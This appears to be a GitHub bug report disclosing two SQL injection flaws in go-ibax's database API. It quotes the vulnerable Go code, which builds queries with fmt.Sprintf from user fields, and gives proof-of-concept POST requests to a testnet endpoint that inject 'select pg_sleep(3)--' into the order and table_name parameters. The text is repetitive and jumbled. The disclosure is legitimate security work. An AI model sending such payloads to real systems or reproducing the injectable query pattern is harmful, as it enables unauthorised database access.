query:=fmt.Sprintf("SELECT tablename from pg_tables where schemaname ='public' and tablename like %s order by %s offset %d limit %d", "'%"+form.Table_name+"%'", form.Order, (form.Page-1)*form.Limit, form.Limit)
query:=fmt.Sprintf("SELECT tablename from pg_tables where schemaname ='public' and tablename like %s order by %s offset %d limit %d", "'%"+form.Table_name+"%'", form.Order, (form.Page-1)*form.Limit, form.Limit)
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
sqlQuery:=fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name='%s' ORDER BY %s", form.Table_name, order)
sqlQuery:=fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name='%s' ORDER BY %s", form.Table_name, order)
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--
Reproduction
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
Describe the bug
There are two SQL injection vulnerabilities
First place
file:
go-ibax/packages/api/database.go
Line 92 in 6bac746
POC:
POST
https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfodata:
page=1&limit=1&order=1; select pg_sleep(3)--Second place
file:
go-ibax/packages/api/database.go
Line 120 in 6bac746
POC:
POST
https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfodata:
table_name=1; select pg_sleep(3)--Reproduction
POST
https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfodata:
page=1&limit=1&order=1; select pg_sleep(3)--as you can see, when I use
pg_sleep, the request is delayed 3s.System Info
*Logs
No response
Validations
The text was updated successfully, but these errors were encountered: